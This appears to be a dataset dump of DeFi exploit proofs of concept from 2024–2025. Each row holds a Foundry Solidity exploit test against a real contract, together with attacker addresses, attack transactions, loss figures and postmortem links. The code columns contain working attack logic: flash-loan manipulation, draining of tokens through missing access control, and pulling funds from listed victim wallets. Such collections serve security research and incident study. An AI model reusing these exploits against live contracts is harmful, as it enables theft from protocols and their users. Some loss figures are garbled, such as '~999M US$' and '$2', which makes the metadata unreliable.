source_code stringlengths 878 31.2k | type stringclasses 1
value | protocol stringlengths 2 33 | date stringclasses 70
values | file_name stringlengths 10 41 | attack_vector stringclasses 4
values | content_hash stringlengths 16 16 | collected_at stringdate 2026-01-07 10:59:16 2026-01-07 10:59:16 | _source stringclasses 1
value | chain stringclasses 8
values | block_number int64 1.11M 356M ⌀ | total_lost_raw stringlengths 3 127 ⌀ | total_lost_usd float64 0 19,026B ⌀ | attacker_address stringlengths 65 82 ⌀ | attack_contract stringlengths 70 89 ⌀ | vulnerable_contract stringlengths 68 82 ⌀ | attack_tx stringlengths 89 115 ⌀ | postmortem_url stringclasses 85
values | twitter_url stringlengths 48 62 ⌀ | has_keyinfo bool 2
classes | has_analysis bool 2
classes | has_attack_vector bool 2
classes | severity stringclasses 4
values | severity_raw stringlengths 3 127 ⌀ | category stringclasses 5
values | exploit_code stringlengths 0 25.5k | has_exploit_code bool 2
classes | keyinfo_total_lost stringlengths 0 127 | keyinfo_attacker stringlengths 0 82 | keyinfo_attack_contract stringlengths 0 89 | keyinfo_vulnerable_contract stringlengths 0 82 | keyinfo_attack_tx stringlengths 0 115 | analysis_postmortem stringclasses 82
values | analysis_twitter stringlengths 0 62 | funds_lost_formatted stringlengths 2 13 | content_richness_score float64 0.63 10 | quality_estimate stringclasses 3
values | title stringlengths 20 51 | has_total_lost bool 2
classes | has_vulnerable_contract bool 2
classes | has_attack_tx bool 2
classes | has_postmortem bool 2
classes |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ≈135k
// Attacker : 0x3026C464d3Bd6Ef0CeD0D49e80f171b58176Ce32
// Attack Contract : https://bscscan.com/address/0x61dd07ce0cecf0d7bacf5eb208c57d16bbdee168
// Vulnerable Contract : https://bscscan.com/address/0xb000f121A173D7Dd638bb080fE... | exploit_poc | Z123 | 2024-04 | Z123_exp.sol | null | 822471b73a0cfb7c | 2026-01-07T10:59:16.527008 | postmortems | bsc | 38,077,210 | ≈135k | 135,000 | null | https://bscscan.com/address/0x61dd07ce0cecf0d7bacf5eb208c57d16bbdee168 | https://bscscan.com/address/0xb000f121A173D7Dd638bb080fEe669a2F3Af9760 | https://bscscan.com/tx/0xc0c4e99a76da80a4cf43d3110364840151226c0a197c1728bb60dc3f1b3a6a27 | null | null | true | true | false | high | ≈135k | unknown | function testExploit() public {
emit log_named_decimal_uint("befor ack usdc balance = ", bsc_usd_.balanceOf(address(this)), bsc_usd_.decimals());
pancakeV3_.flash(address(this), 18_000_000 ether, 0, "");
emit log_named_decimal_uint(
"after profit usdc balance = ", bsc_usd_.balanceOf(... | true | ≈135k | https://bscscan.com/address/0x61dd07ce0cecf0d7bacf5eb208c57d16bbdee168 | https://bscscan.com/address/0xb000f121A173D7Dd638bb080fEe669a2F3Af9760 | https://bscscan.com/tx/0xc0c4e99a76da80a4cf43d3110364840151226c0a197c1728bb60dc3f1b3a6a27 | $135.0K | 7.35 | medium | Z123 Exploit (2024-04) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~999M US$
// Attacker : 0xBEF24B94C205999ea17d2ae4941cE849C9114bfd
// Attack Contract : 0x9C63d6328C8e989c99b8e01DE6825e998778B103
// Vulnerable Contract : 0xFd80a436dA2F4... | exploit_poc | SATX | 2024-04 | SATX_exp.sol | null | e008fd57970a2cd7 | 2026-01-07T10:59:16.527062 | postmortems | bsc | 37,914,434 | ~999M US$ | 999,000,000 | null | null | null | https://bscscan.com/tx/0x7e02ee7242a672fb84458d12198fae4122d7029ba64f3673e7800d811a8de93f | null | null | true | false | false | critical | ~999M US$ | unknown | function testExploit() public {
deal(attacker, 0.900000001 ether);
WBNB.deposit{value: 0.9 ether}();
approveAll();
address[] memory path = new address[](2);
path[0] = address(WBNB);
path[1] = address(SATX);
router.swapExactTokensForTokensSupportingFeeOnTransferTok... | true | ~999M US$ | https://bscscan.com/tx/0x7e02ee7242a672fb84458d12198fae4122d7029ba64f3673e7800d811a8de93f | $999.00M | 6.81 | medium | SATX Exploit (2024-04) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
import "../interface.sol";
// Total Lost: >$100k
// Attacker: 0x306174b707ebf6d7301a0bcd898ae1666ec176ae
// Attack Contract: 0x797acb321cb10154aa807fcd1e155c34135483cd
// Attack Contract: 0x797acb321cb10154aa807fcd1e155c34135... | exploit_poc | MARS | 2024-04 | MARS_exp.sol | flash_loan | bd7e4ce842b5e36b | 2026-01-07T10:59:16.527107 | postmortems | unknown | 37,903,299 | >$100k | 100,000 | null | null | null | https://app.blocksec.com/explorer/tx/bsc/0x25e2af0a55581d5629a933af9fedd3c70e6d0c320f0b72700ca80e5cdd36c80b | null | null | false | false | true | high | >$100k | flash-loan | function testExploit_MARS() public {
v3pair.flash(address(this), 0, lending_amount, "");
} | true | https://app.blocksec.com/explorer/tx/bsc/0x25e2af0a55581d5629a933af9fedd3c70e6d0c320f0b72700ca80e5cdd36c80b | $100.0K | 8.14 | high | MARS Exploit (2024-04) | true | false | true | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 350K
// Attacker : /address/https://basescan.org/address/0xbb344544ad328b5492397e967fe81737855e7e77
// Attack Contract : /address/https://basescan.org/address/0x13d27a2d... | exploit_poc | SumerMoney | 2024-04 | SumerMoney_exp.sol | flash_loan | 9e3e094cc75906ba | 2026-01-07T10:59:16.527158 | postmortems | base | null | 350K | 350,000 | null | null | null | null | null | null | true | true | true | high | 350K | flash-loan | function testExploit() public {
deal(address(this), 1);
address[] memory tokens = new address[](2);
tokens[0] = address(WETH);
tokens[1] = address(USDC);
uint256[] memory amounts = new uint256[](2);
amounts[0] = 150 ether;
amounts[1] = 645_000 * 1e6;
bytes... | true | 350K | $350.0K | 7.75 | medium | SumerMoney Exploit (2024-04) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0xe15d6f7fa891c2626819209edf2d5ded6948310eaada067b400062aa022ce718
// GUY : https://x.com/ChainAegis/status/1779809931962827055
// Profit : ~14K US... | exploit_poc | GFA | 2024-04 | GFA_exp.sol | null | 228061c3f3d9c4ab | 2026-01-07T10:59:16.527216 | postmortems | unknown | 37,857,763 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_decimal_uint(
"attacker balance BUSD before attack:", BUSD.balanceOf(address(this)), BUSD.decimals()
);
attack();
emit log_named_decimal_uint(
"attacker balance BUSD after attack:", BUSD.balanceOf(address(this)), BUSD... | true | Unknown | 3.29 | low | GFA Exploit (2024-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
// @KeyInfo - Total Lost : 1.4M
// Attacker : https://etherscan.io/address/0x19066f7431df29a0910d287c8822936bb7d89e23
// Attack Contract : https://etherscan.io/address/0x1da4bc596bfb1087f2f7999b0340fcba03c47fbd
// Vulnerable ... | exploit_poc | PikeFinance | 2024-04 | PikeFinance_exp.sol | null | d9f071c27a48eeb6 | 2026-01-07T10:59:16.527261 | postmortems | ethereum | null | 1.4M | 1,400,000 | https://etherscan.io/address/0x19066f7431df29a0910d287c8822936bb7d89e23 | https://etherscan.io/address/0x1da4bc596bfb1087f2f7999b0340fcba03c47fbd | https://etherscan.io/address/0xfc7599cffea9de127a9f9c748ccb451a34d2f063 | https://etherscan.io/tx/0xe2912b8bf34d561983f2ae95f34e33ecc7792a2905a3e317fcc98052bce66431 | null | null | true | true | false | critical | 1.4M | unknown | function testExploit() public {
emit log_named_decimal_uint(" Attacker ETH Balance Before exploit", address(this).balance, 18);
// Initialize proxy contract
address _owner = address(this);
address _WNativeAddress = address(this);
address _uniswapHelperAddress = address(this);
... | true | 1.4M | https://etherscan.io/address/0x19066f7431df29a0910d287c8822936bb7d89e23 | https://etherscan.io/address/0x1da4bc596bfb1087f2f7999b0340fcba03c47fbd | https://etherscan.io/address/0xfc7599cffea9de127a9f9c748ccb451a34d2f063 | https://etherscan.io/tx/0xe2912b8bf34d561983f2ae95f34e33ecc7792a2905a3e317fcc98052bce66431 | $1.40M | 7.28 | medium | PikeFinance Exploit (2024-04) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0xea181f730886ece947e255ab508f5af1d0f569fee3368b651d5dbb28549087b5
// Vulnearable Contract: 0x11cee747Faaf0C0801075253ac28aB503C888888
// GUY : htt... | exploit_poc | Hackathon | 2024-04 | Hackathon_exp.sol | flash_loan | 9a0b945064be40ff | 2026-01-07T10:59:16.527311 | postmortems | unknown | 37,854,043 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"attacker balance BUSD before attack:", BUSD.balanceOf(address(this)), BUSD.decimals()
);
DPP.flashLoan(0, 200_000 ether, address(this), new bytes(1));
emit log_named_decimal_uint(
"attacker balance BUSD... | true | Unknown | 4.37 | low | Hackathon Exploit (2024-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 2_517_438_179_912_631_607_253_979 WSM ≈ 18K
// Attacker : 0x3026C464d3Bd6Ef0CeD0D49e80f171b58176Ce32
// Attack Contract : https://bscscan.com/address/0x014eE3c3dE6941cb0... | exploit_poc | WSM | 2024-04 | WSM_exp.sol | flash_loan | b9fcc15620cacfd9 | 2026-01-07T10:59:16.527373 | postmortems | bsc | 37,569,860 | 2_517_438_179_912_631_607_253_979 WSM ≈ 18K | 2 | null | https://bscscan.com/address/0x014eE3c3dE6941cb0202Dd2b30C89309e874B114 | https://bscscan.com/address/0xc0afd0e40bb3dcaebd9451aa5c319b745bf792b4 | https://bscscan.com/tx/0x5a475a73343519f899527fdb9850f68f8fc73168073c72a3cff8c0c7b8a1e520 | null | null | true | true | true | low | 2_517_438_179_912_631_607_253_979 WSM ≈ 18K | flash-loan | function testExploit() public {
console.log("1. before attack wsh token balance of this = ", wshToken_.balanceOf(address(this)));
BNB_WSH_10000.flash(address(this), 5_000_000 ether, 0, "");
console.log("8. after attack wsh token balance of this = ", wshToken_.balanceOf(address(this)));
} | true | 2_517_438_179_912_631_607_253_979 WSM ≈ 18K | https://bscscan.com/address/0x014eE3c3dE6941cb0202Dd2b30C89309e874B114 | https://bscscan.com/address/0xc0afd0e40bb3dcaebd9451aa5c319b745bf792b4 | https://bscscan.com/tx/0x5a475a73343519f899527fdb9850f68f8fc73168073c72a3cff8c0c7b8a1e520 | $2 | 8.89 | high | WSM Exploit (2024-04) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
// @KeyInfo - Total Lost: ~190K
// Attacker: https://bscscan.com/address/0xd03d360dfc1dac7935e114d564a088077e6754a0
// Attack Contract: https://bscscan.com/address/0xc73781107d086754314f7720ca14ab8c5ad035e4
// Vulnerable Cont... | exploit_poc | NGFS | 2024-04 | NGFS_exp.sol | null | 46473e7937c4c4ab | 2026-01-07T10:59:16.527429 | postmortems | bsc | null | ~190K | 190,000 | https://bscscan.com/address/0xd03d360dfc1dac7935e114d564a088077e6754a0 | https://bscscan.com/address/0xc73781107d086754314f7720ca14ab8c5ad035e4 | https://bscscan.com/address/0xa608985f5b40cdf6862bec775207f84280a91e3a | https://bscscan.com/tx/0x8ff764dde572928c353716358e271638fa05af54be69f043df72ad9ad054de25 | https://louistsai.vercel.app/p/2024-04-25-ngfs-exploit/ | https://twitter.com/CertiKAlert/status/1783476515331616847 | true | true | false | high | ~190K | unknown | function testExploit() public {
uint256 tokenBalanceBefore = IBEP20(USDT_TOKEN).balanceOf(address(this));
emit log_named_decimal_uint("Attacker USDT Balance Before exploit", tokenBalanceBefore, 18);
address pair = IPancakeFactory(PANCAKE_FACTORY).getPair(NGFS_TOKEN, USDT_TOKEN);
INGFSTo... | true | ~190K | https://bscscan.com/address/0xd03d360dfc1dac7935e114d564a088077e6754a0 | https://bscscan.com/address/0xc73781107d086754314f7720ca14ab8c5ad035e4 | https://bscscan.com/address/0xa608985f5b40cdf6862bec775207f84280a91e3a | https://bscscan.com/tx/0x8ff764dde572928c353716358e271638fa05af54be69f043df72ad9ad054de25 | https://louistsai.vercel.app/p/2024-04-25-ngfs-exploit/ | https://twitter.com/CertiKAlert/status/1783476515331616847 | $190.0K | 7.67 | medium | NGFS Exploit (2024-04) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~5 $ETH
// Attacker : https://bscscan.com/address/0x123fa25c574bb3158ecf6515595932a92a1da510
// Attack Contract : https://bscscan.com/address/0xe6e06030b33593d140f224fc1cdd1b8ffe99e50a
// Vulnerable Contract : https://bscscan.co... | exploit_poc | BNBX | 2024-04 | BNBX_exp.sol | null | 734c11f50f1acc5a | 2026-01-07T10:59:16.527479 | postmortems | bsc | 38,230,509 | ~5 $ETH | 5 | https://bscscan.com/address/0x123fa25c574bb3158ecf6515595932a92a1da510 | https://bscscan.com/address/0xe6e06030b33593d140f224fc1cdd1b8ffe99e50a | https://bscscan.com/address/0x389a9ae29fbe53cca7bc8b7a4d9d0a04078e1c24 | https://bscscan.com/tx/0xea88dc6dbd81d09c572b5849e0d4508598edcf8f11c9a995cd8fe7e6c194f39e | null | null | true | false | false | low | ~5 $ETH | unknown | function testExploit() public {
emit log_named_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this)));
// 10 victims as an example
address[] memory victims = new address[](10);
victims[0] = 0xE71F1d71aFe531bCd9b89f82D8a44B04F73b7146;
victims[1] = 0xe497e225407... | true | ~5 $ETH | https://bscscan.com/address/0x123fa25c574bb3158ecf6515595932a92a1da510 | https://bscscan.com/address/0xe6e06030b33593d140f224fc1cdd1b8ffe99e50a | https://bscscan.com/address/0x389a9ae29fbe53cca7bc8b7a4d9d0a04078e1c24 | https://bscscan.com/tx/0xea88dc6dbd81d09c572b5849e0d4508598edcf8f11c9a995cd8fe7e6c194f39e | $5 | 7.62 | medium | BNBX Exploit (2024-04) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 36K
// Attacker : https://arbiscan.io/address/0xc91cb089084f0126458a1938b794aa73b9f9189d
// Attack Contract : https://arbiscan.io/address/0x68d843d31de072390d41bff30b0076b... | exploit_poc | Rico | 2024-04 | Rico_exp.sol | null | 91e171d0d885f409 | 2026-01-07T10:59:16.527532 | postmortems | arbitrum | null | 36K | 36,000 | https://arbiscan.io/address/0xc91cb089084f0126458a1938b794aa73b9f9189d | https://arbiscan.io/address/0x68d843d31de072390d41bff30b0076bef0482d8f | https://arbiscan.io/address/0x598c6c1cd9459f882530fc9d7da438cb74c6cb3b | https://arbiscan.io/tx/0x5d2a94785d95a740ec5f778e79ff014c880bcefec70d1a7c2440e611f84713d6 | null | https://twitter.com/0xlouistsai/status/1781845191047164016 | true | true | false | medium | 36K | unknown | function testExploit() public {
emit log_named_decimal_uint(
"Attacker USDC Balance Before exploit", IERC20(USDC_TOKEN).balanceOf(address(this)), 6
);
// Transfer tokens from BankDiamond to the attacker
transferTokens(USDC_TOKEN);
transferTokens(ARB_TOKEN);
t... | true | 36K | https://arbiscan.io/address/0xc91cb089084f0126458a1938b794aa73b9f9189d | https://arbiscan.io/address/0x68d843d31de072390d41bff30b0076bef0482d8f | https://arbiscan.io/address/0x598c6c1cd9459f882530fc9d7da438cb74c6cb3b | https://arbiscan.io/tx/0x5d2a94785d95a740ec5f778e79ff014c880bcefec70d1a7c2440e611f84713d6 | https://twitter.com/0xlouistsai/status/1781845191047164016 | $36.0K | 8.29 | high | Rico Exploit (2024-04) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~5k $BUSD
// Attacker : https://bscscan.com/address/0xc1b6f9898576d722dbf604aaa452cfea3a639c59
// Attack Contract : https://bscscan.com/address/0xb22cf0e1672344f23f3126fbd35f856e961fd780
// Vulnerable Contract : https://bscscan.... | exploit_poc | BigBangSwap | 2024-04 | BigBangSwap_exp.sol | flash_loan | d45da9401aca34a5 | 2026-01-07T10:59:16.527582 | postmortems | bsc | 37,740,105 | ~5k $BUSD | 5,000 | https://bscscan.com/address/0xc1b6f9898576d722dbf604aaa452cfea3a639c59 | https://bscscan.com/address/0xb22cf0e1672344f23f3126fbd35f856e961fd780 | https://bscscan.com/address/0xa45d4359246dbd523ab690bef01da06b07450030 | https://app.blocksec.com/explorer/tx/bsc/0x94055664287a565d4867a97ba6d5d2e28c55d10846e3f83355ba84bd1b9280fc | null | null | true | true | true | low | ~5k $BUSD | flash-loan | function testExploit() public {
BUSD.transfer(address(0x000000000000000000000000000000000000dEaD), BUSD.balanceOf(address(this)));
BUSD.approve(address(Router), type(uint256).max);
BGG.approve(address(TransparentUpgradeableProxy), type(uint256).max);
emit log_named_uint("Attacker BUSD ... | true | ~5k $BUSD | https://bscscan.com/address/0xc1b6f9898576d722dbf604aaa452cfea3a639c59 | https://bscscan.com/address/0xb22cf0e1672344f23f3126fbd35f856e961fd780 | https://bscscan.com/address/0xa45d4359246dbd523ab690bef01da06b07450030 | https://app.blocksec.com/explorer/tx/bsc/0x94055664287a565d4867a97ba6d5d2e28c55d10846e3f83355ba84bd1b9280fc | $5.0K | 9.42 | high | BigBangSwap Exploit (2024-04) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0x9fcf38d0af4dd08f4d60f7658b623e35664e74bca0eaebdb0c3b9a6965d6257b
// GUY : https://twitter.com/bbbb/status/1777228277415039304
// Profit : ~87K ... | exploit_poc | SQUID | 2024-04 | SQUID_exp.sol | null | 8f928f3c9cb56977 | 2026-01-07T10:59:16.527635 | postmortems | unknown | 37,672,969 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.73 | low | SQUID Exploit (2024-04) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;
import {Test, console2} from "forge-std/Test.sol";
import "./../interface.sol";
// TX 1:https://app.blocksec.com/explorer/tx/bsc/0x383dbb44a91687b2b9bbd8b6779957a198d114f24af662776f384569b84fc549
// TX 2: https://app.blocksec.com/explorer/tx/bsc/0x829394... | exploit_poc | GROKD | 2024-04 | GROKD_exp.sol | access_control | b42f83c24e4f54c0 | 2026-01-07T10:59:16.527694 | postmortems | bsc | 37,622,476 | null | null | null | null | null | null | null | null | false | false | true | medium | null | access-control | false | Unknown | 4 | low | GROKD Exploit (2024-04) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
// @KeyInfo - Total Lost : ~200K
// Attacker1 : https://bscscan.com/address/0x6eec0f4c017afe3dfadf32b51339c37e9fd59dfb
// Attack Contract : https://bscscan.com/address/0x791c6542bc52efe4f20df0ee672b88579ae3fd9a
// Vulnerable ... | exploit_poc | ChaingeFinance | 2024-04 | ChaingeFinance_exp.sol | null | 0276d3c66b4a9e89 | 2026-01-07T10:59:16.527767 | postmortems | bsc | null | ~200K | 200,000 | null | https://bscscan.com/address/0x791c6542bc52efe4f20df0ee672b88579ae3fd9a | https://bscscan.com/address/0x80a0d7a6fd2a22982ce282933b384568e5c852bf | https://bscscan.com/tx/0xd348b5fc00b26fc1457b70d02f9cb5e5a66a564cc4eba2136a473866a47dac08 | null | null | true | true | false | high | ~200K | unknown | function testExploit() public {
address[12] memory targetToken = [
address(usdt),
address(sol),
address(AVAX),
address(babydoge),
address(FOLKI),
address(ATOM),
address(TLOS),
address(IOTX),
address(linch... | true | ~200K | https://bscscan.com/address/0x791c6542bc52efe4f20df0ee672b88579ae3fd9a | https://bscscan.com/address/0x80a0d7a6fd2a22982ce282933b384568e5c852bf | https://bscscan.com/tx/0xd348b5fc00b26fc1457b70d02f9cb5e5a66a564cc4eba2136a473866a47dac08 | $200.0K | 9 | high | ChaingeFinance Exploit (2024-04) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~234K
// Attacker : https://bscscan.com/address/0x5bb5b6d41c3e5e41d9b9ed33d12f1537a1293d5f
// Vulnerable Contract : https://bscscan.com/address/0xf436f8fe7b26d87eb74e544... | exploit_poc | OpenLeverage2 | 2024-04 | OpenLeverage2_exp.sol | null | 3b8fc9d549e7c717 | 2026-01-07T10:59:16.527846 | postmortems | bsc | 37,470,328 | ~234K | 234,000 | https://bscscan.com/address/0x5bb5b6d41c3e5e41d9b9ed33d12f1537a1293d5f | null | https://bscscan.com/address/0xf436f8fe7b26d87eb74e5446acec2e8ad4075e47 | null | null | null | true | true | false | high | ~234K | unknown | function testExploit() public {
// First TX
deal(address(this), 5 ether);
emit log_named_decimal_uint("Exploiter BNB balance before attack", address(this).balance, 18);
USDC.approve(address(Router), type(uint256).max);
BUSDT.approve(address(Router), type(uint256).max);
... | true | ~234K | https://bscscan.com/address/0x5bb5b6d41c3e5e41d9b9ed33d12f1537a1293d5f | https://bscscan.com/address/0xf436f8fe7b26d87eb74e5446acec2e8ad4075e47 | $234.0K | 8 | high | OpenLeverage2 Exploit (2024-04) | true | true | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/eth/0x998f1da472d927e74405b0aa1bbf5c1dbc50d74b39977bed3307ea2ada1f1d3f
// GUY : https://x.com/CyversAlerts/status/1780593407871635538
// Profit : ~18 W... | exploit_poc | UnverifiedContr_0x00C409 | 2024-04 | UnverifiedContr_0x00C409_exp.sol | null | fd8c84e774e340a9 | 2026-01-07T10:59:16.527919 | postmortems | unknown | 19,255,512 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function attack() public {
weth.withdraw(4704.1 ether);
address(vulnContract).call{value: 4704.1 ether}("");
bytes memory data = abi.encodeWithSelector(
bytes4(0xba381f8f),
0xffffffffffffffffff,
0x01,
address(this),
address(this),
... | true | Unknown | 3.71 | low | UnverifiedContr_0x00C409 Exploit (2024-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 14.5k USD
// Attacker : https://arbiscan.io/address/0x5fb0b8584b34e56e386941a65dbe455ad43c5a23
// Attack Contract : N/A
// Vulnerable Contract : https://arbiscan.io/address/0xf9FF933f51bA180a474634440a... | exploit_poc | Stead | 2025-06 | Stead_exp.sol | access_control | 271e87152bbff64b | 2026-01-07T10:59:16.527965 | postmortems | arbitrum | null | 14.5k USD | 14,500 | https://arbiscan.io/address/0x5fb0b8584b34e56e386941a65dbe455ad43c5a23 | null | https://arbiscan.io/address/0xf9FF933f51bA180a474634440a406c95DfB27596 | https://arbiscan.io/tx/0x32dbfce2253002498cd41a2d79e249250f92673bc3de652f3919591ee26e8001 | null | https://x.com/TenArmorAlert/status/1939508301596672036 | true | true | true | medium | 14.5k USD | access-control | function testExploit() public balanceLog {
// The contract 0xf9ff lacks proper access control, allowing any to drain STEAD tokens from the contract.
bytes4 selector = 0x16fb27ce;
(bool success, ) = VICTIM.call(abi.encodePacked(selector, abi.encode(1, 1, 1)));
require(success, "Call faile... | true | 14.5k USD | https://arbiscan.io/address/0x5fb0b8584b34e56e386941a65dbe455ad43c5a23 | https://arbiscan.io/address/0xf9FF933f51bA180a474634440a406c95DfB27596 | https://arbiscan.io/tx/0x32dbfce2253002498cd41a2d79e249250f92673bc3de652f3919591ee26e8001 | https://x.com/TenArmorAlert/status/1939508301596672036 | $14.5K | 7.71 | medium | Stead Exploit (2025-06) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 9.6M USD
// Attacker : https://etherscan.io/address/0x6d9f6e900ac2ce6770fd9f04f98b7b0fc355e2ea
// Attack Contract : https://etherscan.io/address/0xf90da523a7c19a0a3d8d4606242c46f1ee459dc7
// Vulnerable... | exploit_poc | ResupplyFi | 2025-06 | ResupplyFi_exp.sol | flash_loan | fc28f11991fc7643 | 2026-01-07T10:59:16.528005 | postmortems | ethereum | null | 9.6M USD | 9,600,000 | https://etherscan.io/address/0x6d9f6e900ac2ce6770fd9f04f98b7b0fc355e2ea | https://etherscan.io/address/0xf90da523a7c19a0a3d8d4606242c46f1ee459dc7 | https://etherscan.io/address/0x6e90c85a495d54c6d7E1f3400FEF1f6e59f86bd6 | https://etherscan.io/tx/0xffbbd492e0605a8bb6d490c3cd879e87ff60862b0684160d08fd5711e7a872d3 | https://mirror.xyz/0x521CB9b35514E9c8a8a929C890bf1489F63B2C84/ygJ1kh6satW9l_NDBM47V87CfaQbn2q0tWy_rtp76OI | https://x.com/peckshield/status/1938061948647817647 | true | true | true | critical | 9.6M USD | flash-loan | function testExploit() public balanceLog {
usdc.approve(address(morphoBlue), type(uint256).max);
morphoBlue.flashLoan(address(usdc), flashLoanAmount, hex"");
} | true | 9.6M USD | https://etherscan.io/address/0x6d9f6e900ac2ce6770fd9f04f98b7b0fc355e2ea | https://etherscan.io/address/0xf90da523a7c19a0a3d8d4606242c46f1ee459dc7 | https://etherscan.io/address/0x6e90c85a495d54c6d7E1f3400FEF1f6e59f86bd6 | https://etherscan.io/tx/0xffbbd492e0605a8bb6d490c3cd879e87ff60862b0684160d08fd5711e7a872d3 | https://mirror.xyz/0x521CB9b35514E9c8a8a929C890bf1489F63B2C84/ygJ1kh6satW9l_NDBM47V87CfaQbn2q0tWy_rtp76OI | https://x.com/peckshield/status/1938061948647817647 | $9.60M | 9.74 | high | ResupplyFi Exploit (2025-06) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 25k USD
// Attacker : https://etherscan.io/address/0x48f1d0f5831eb6e544f8cbde777b527b87a1be98
// Attack Contract : https://etherscan.io/address/0xff13d5899aa7d84c10e4cd6fb030... | exploit_poc | MetaPool | 2025-06 | MetaPool_exp.sol | flash_loan | ab7cf3bb982dff8c | 2026-01-07T10:59:16.528059 | postmortems | ethereum | null | 25k USD | 25,000 | https://etherscan.io/address/0x48f1d0f5831eb6e544f8cbde777b527b87a1be98 | https://etherscan.io/address/0xff13d5899aa7d84c10e4cd6fb030b80554424136 | https://etherscan.io/address/0x48afbbd342f64ef8a9ab1c143719b63c2ad81710 | https://etherscan.io/tx/0x57ee419a001d85085478d04dd2a73daa91175b1d7c11d8a8fb5622c56fd1fa69 | https://www.coindesk.com/business/2025/06/17/liquid-staking-protocol-meta-pool-suffers-usd27m-exploit | https://x.com/peckshield/status/1934895187102454206 | true | true | true | medium | 25k USD | flash-loan | function testExploit() public balanceLog {
//implement exploit code here
MetaPoolExploit exploit = new MetaPoolExploit();
exploit.start();
uint256 amount = IMpEth(MPETH_ADDR).balanceOf(address(this));
console.log("Attacker mpETH balance After exploit: ", amount);
}
rece... | true | 25k USD | https://etherscan.io/address/0x48f1d0f5831eb6e544f8cbde777b527b87a1be98 | https://etherscan.io/address/0xff13d5899aa7d84c10e4cd6fb030b80554424136 | https://etherscan.io/address/0x48afbbd342f64ef8a9ab1c143719b63c2ad81710 | https://etherscan.io/tx/0x57ee419a001d85085478d04dd2a73daa91175b1d7c11d8a8fb5622c56fd1fa69 | https://www.coindesk.com/business/2025/06/17/liquid-staking-protocol-meta-pool-suffers-usd27m-exploit | https://x.com/peckshield/status/1934895187102454206 | $25.0K | 9.7 | high | MetaPool Exploit (2025-06) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 5k USD
// Attacker : https://etherscan.io/address/0x1234567a98230550894bf93e2346a8bc5c3b36e3
// Attack Contract : https://etherscan.io/address/0xcb4059bb021f4cf9d90267b796112... | exploit_poc | GradientMakerPool | 2025-06 | GradientMakerPool_exp.sol | flash_loan | b2473b698681eb42 | 2026-01-07T10:59:16.528116 | postmortems | ethereum | null | 5k USD | 5,000 | https://etherscan.io/address/0x1234567a98230550894bf93e2346a8bc5c3b36e3 | https://etherscan.io/address/0xcb4059bb021f4cf9d90267b7961125210cedb792 | https://etherscan.io/address/0x37Ea5f691bCe8459C66fFceeb9cf34ffa32fdadC | https://etherscan.io/tx/0xb5cfa3f86ce9506e2364475dc43c44de444b079d4752edbffcdad7d1654b1f67 | https://t.me/defimon_alerts/1340 | null | true | true | true | low | 5k USD | flash-loan | function testExploit() public balanceLog {
//implement exploit code here
morphoBlue.flashLoan(address(weth), BORROW_AMOUNT, "");
